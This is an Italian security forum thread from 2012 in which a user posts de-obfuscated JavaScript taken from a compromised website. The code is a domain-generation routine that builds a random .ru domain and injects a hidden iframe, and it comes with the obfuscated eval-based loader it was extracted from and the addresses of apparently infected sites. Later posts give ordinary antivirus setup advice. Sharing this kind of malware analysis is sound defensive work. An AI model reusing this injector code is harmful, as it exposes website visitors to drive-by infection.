|
|||||||
|
|
|
![]() |
|
|
Strumenti |
|
|
#4821 | |
|
Bannato
Iscritto dal: Sep 2001
Città: Montecatini Terme
Messaggi: 8808
|
Quote:
|
|
|
|
|
|
|
#4822 | |
|
Bannato
Iscritto dal: Apr 2012
Messaggi: 569
|
Quote:
da decodificare modulo 4 +1. Codice:
function nextRandomNumber(){
var hi = this.seed / this.Q;
var lo = this.seed % this.Q;
var test = this.A * lo - this.R * hi;
if(test > 0){
this.seed = test;
} else {
this.seed = test + this.M;
}
return (this.seed * this.oneOverM);
}
function RandomNumberGenerator(unix){
var d = new Date(unix*1000);
var s = d.getHours() > 12 ? 1 : 0;
this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF)+ (Math.round(s * 0xFFF));
this.A = 48271;
this.M = 2147483647;
this.Q = this.M / this.A;
this.R = this.M % this.A;
this.oneOverM = 1.0 / this.M;
this.next = nextRandomNumber;
return this;
}
function createRandomNumber(r, Min, Max){
return Math.round((Max-Min) * r.next() + Min);
}
function generatePseudoRandomString(unix, length, zone){
var rand = new RandomNumberGenerator(unix);
var letters = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z'];
var str = '';
for(var i = 0; i < length; i ++ ){
str += letters[createRandomNumber(rand, 0, letters.length - 1)];
}
return str + '.' + zone;
}
setTimeout(function(){
try{
if(typeof iframeWasCreated == "undefined"){
iframeWasCreated = true;
var unix = Math.round(+new Date()/1000);
var domainName = generatePseudoRandomString(unix, 16, 'ru');
ifrm = document.createElement("IFRAME");
ifrm.setAttribute("src", "http://"+domainName+"/runforestrun?sid=cx");
ifrm.style.width = "0px";
ifrm.style.height = "0px";
ifrm.style.visibility = "hidden";
document.body.appendChild(ifrm);
}
}catch(e){}
}, 500);
Codice:
try{
q=document.createElement("p");
q.appendChild(q+"");
}
catch(qw)
{
h=-012/5;
try{bcsd=prototype-2;}
catch(bawg)
[...] ss = quella roba sopra
e(ss);
Ultima modifica di fcorbelli : 17-06-2012 alle 19:14. |
|
|
|
|
|
|
#4823 | |
|
Moderatore
Iscritto dal: Jun 2007
Città: 127.0.0.1
Messaggi: 25885
|
Quote:
__________________
Try again and you will be luckier.
|
|
|
|
|
|
|
#4824 | |
|
Moderatore
Iscritto dal: Jun 2007
Città: 127.0.0.1
Messaggi: 25885
|
Quote:
__________________
Try again and you will be luckier.
|
|
|
|
|
|
|
#4825 | |
|
Senior Member
Iscritto dal: Jul 2008
Messaggi: 8224
|
Quote:
__________________
System Failure |
|
|
|
|
|
|
#4826 | |
|
Bannato
Iscritto dal: Apr 2012
Messaggi: 569
|
Quote:
Codice:
/*km0ae9gr6m*/try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-012/5;try{bcsd=prototype-2;}catch(bawg){ss=[];f=(h)?("fromCharC"+"ode"):"";e=window["e"+"val"];n=[...];if(window.document)for(i=6-2-1-2-1;-1771+i!=2-2;i++){k=i;ss=ss+String[f](n[k]/(i%(h*h)+2-1));}e(ss);}}/*qhk6sa6g1c*/
|
|
|
|
|
|
|
#4827 | |
|
Moderatore
Iscritto dal: Jun 2007
Città: 127.0.0.1
Messaggi: 25885
|
Quote:
__________________
Try again and you will be luckier.
|
|
|
|
|
|
|
#4828 | |
|
Bannato
Iscritto dal: Apr 2012
Messaggi: 569
|
Quote:
Questo è l'originale di quel sito francocorbelli.com/virusselli/jcarousel.js da cui ho "sprotetto" il malware Ce ne son tanti in giro, eccone uno carino temptationfoods.com/brand_KarenAnand_Conserves.asp?catid=1 Ultima modifica di Chill-Out : 18-06-2012 alle 12:31. Motivo: No link cliccabili |
|
|
|
|
|
|
#4829 | |
|
Moderatore
Iscritto dal: Jun 2007
Città: 127.0.0.1
Messaggi: 25885
|
Quote:
__________________
Try again and you will be luckier.
|
|
|
|
|
|
|
#4830 | |
|
Senior Member
Iscritto dal: Sep 2009
Messaggi: 326
|
Quote:
Posso stare tranquillo? |
|
|
|
|
|
|
#4831 |
|
Senior Member
Iscritto dal: May 2008
Città: Bergamo
Messaggi: 5466
|
__________________
Xiaomi Mi9T (Glacier Blue) |
|
|
|
|
|
#4832 | |
|
Senior Member
Iscritto dal: Mar 2008
Messaggi: 20537
|
Quote:
Certo che è ben strano e degno di essere riportato che uno mette su un server un file malevolo e se si prova a scaricare gli antivirus intervengono a bloccare l'operazione. Decisamente strano... ma di che hanno discusso negli ultimi post di questo thread? Saluti. |
|
|
|
|
|
|
#4833 | |
|
Moderatore
Iscritto dal: Jun 2007
Città: 127.0.0.1
Messaggi: 25885
|
Quote:
__________________
Try again and you will be luckier.
|
|
|
|
|
|
|
#4834 |
|
Senior Member
Iscritto dal: Sep 2009
Messaggi: 326
|
|
|
|
|
|
|
#4835 |
|
Moderatore
Iscritto dal: Jun 2007
Città: 127.0.0.1
Messaggi: 25885
|
Si
__________________
Try again and you will be luckier.
|
|
|
|
|
|
#4836 |
|
Senior Member
Iscritto dal: Dec 2009
Messaggi: 825
|
Consiglio su configurazione di sicurezza su windows 7 64 bit
real time: 1.antivirus: avira personal 12 2.firewall:Private Firewall 7.0.28.1 on demand: HitmanPro 3.6.0 64bit Malwarebytes Anti-Malware Sandboxie (per navigazione su siti sconosciuti e per aprire programmi sconosciuti e potenzialmente infetti) Browser: Firefox-Google Chrome-Opera con Adblockplus+Wot Norton dns A - Security (malware, phishing sites and scam sites) configurati direttamente nel router Chiedo giudizi sulla configurazione e consigli su eventuali miglioramenti!
__________________
Il sapere è un'avventura senza fine ai confini dell'incertezza"Frank Herbert" Xbox-360 slim 250gb ≈ Toshiba a300-1mz Windows 7 64 bit ≈ Samsung tab 2 7.0" 8Gb |
|
|
|
|
|
#4837 |
|
Senior Member
Iscritto dal: Dec 2006
Messaggi: 3255
|
@ the_noiser
Per me la tua configurazione va benissimo. Non cambierei nè più nè meno. |
|
|
|
|
|
#4838 | |
|
Senior Member
Iscritto dal: Dec 2009
Messaggi: 825
|
Quote:
pensavo dovessi configurare meglio i browser con qualche plugin di sicurezza in più volendo fare qualche test??? Con la versione personal di avira? viene bloccato l'url?
__________________
Il sapere è un'avventura senza fine ai confini dell'incertezza"Frank Herbert" Xbox-360 slim 250gb ≈ Toshiba a300-1mz Windows 7 64 bit ≈ Samsung tab 2 7.0" 8Gb Ultima modifica di the_noiser : 19-06-2012 alle 12:38. |
|
|
|
|
|
|
#4839 |
|
Senior Member
Iscritto dal: Dec 2006
Messaggi: 3255
|
Sulla questione browser c'è questo specifico thread in cui vengono suggerite le migliori configurazioni possibili in termini di sicurezza e con suggerimenti riguardo le eventuali estensioni da adottare. E' tutto spiegato in modo molto esauriente. D'altronde utilizzi 3 browser quindi quel thread devi leggerlo per forza
|
|
|
|
|
|
#4840 | ||
|
Senior Member
Iscritto dal: Dec 2009
Messaggi: 825
|
Quote:
Quote:
mbe?
__________________
Il sapere è un'avventura senza fine ai confini dell'incertezza"Frank Herbert" Xbox-360 slim 250gb ≈ Toshiba a300-1mz Windows 7 64 bit ≈ Samsung tab 2 7.0" 8Gb |
||
|
|
|
|
| Strumenti | |
|
|
Tutti gli orari sono GMT +1. Ora sono le: 00:59.













mbe?








